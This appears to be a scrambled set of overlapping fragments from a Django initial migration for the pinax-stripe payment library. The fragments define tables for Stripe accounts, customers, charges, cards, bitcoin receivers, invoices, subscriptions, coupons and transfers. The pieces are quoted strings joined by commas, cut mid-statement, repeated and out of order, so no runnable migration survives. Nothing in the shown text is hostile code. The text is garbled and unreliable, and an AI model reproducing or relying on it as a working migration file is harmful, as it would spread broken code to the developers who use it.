options={ 'abstract': False,", "models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True,", "serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True,", "models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment',", "coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__", "Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal", "models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)),", "('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', 
models.CharField(max_length=15)), ('address_line_2',", "migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan',", "models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True,", "related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False,", "('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name',", "('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True,", "models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), 
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor',", "('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()),", "max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)),", "models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver',", "models.CharField(blank=True, choices=[('Manual', 
'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent',", "('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={", "to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem',", "('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, 
null=True)), ('legal_entity_first_name',", "'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True,", "to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata',", "}, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country',", "'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', 
max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months',", "to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32,", "on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False,", "jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ],", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city',", "('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2,", "to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel(", "), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, 
on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice',", "models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged',", "('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure',", "('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual',", "serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', 
to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True,", "('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)),", "('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group',", "null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions',", "models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", 
"models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)),", "('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval',", "('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks',", "to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True,", "max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id',", "False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), 
('date_purged', models.DateTimeField(blank=True, editable=False,", "name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount',", "max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True,", "models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract':", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode',", "('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice',", "max_length=32, primary_key=True, serialize=False)), 
('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3,", "('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status',", "'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "import unicode_literals from decimal import Decimal from django.conf import settings from django.db import", "choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)),", "models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', 
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan',", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription',", "('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'),", "), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True,", "('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True,", "('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed',", "('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip',", "options={ 'abstract': False, }, ), 
migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True,", "null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor',", "}, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False,", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), 
('charges_enabled', models.BooleanField(default=False)),", "models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)),", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'),", "related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ),", "models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check',", "max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)),", "null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)),", "models.CharField(max_length=191, unique=True)), ('created_at', 
models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration',", "import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True", "migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd',", "models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[", "through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField(", "('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', 
models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country',", "decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True,", "models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True,", "serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True,", "on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id',", "null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by',", "migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', 
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)),", "models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ],", "on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer',", "('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract':", "('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[", "('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, 
bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency',", "('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()),", "field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'),", "models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency',", "('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type',", "__future__ import unicode_literals from decimal import Decimal from django.conf import settings from django.db", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver',", 
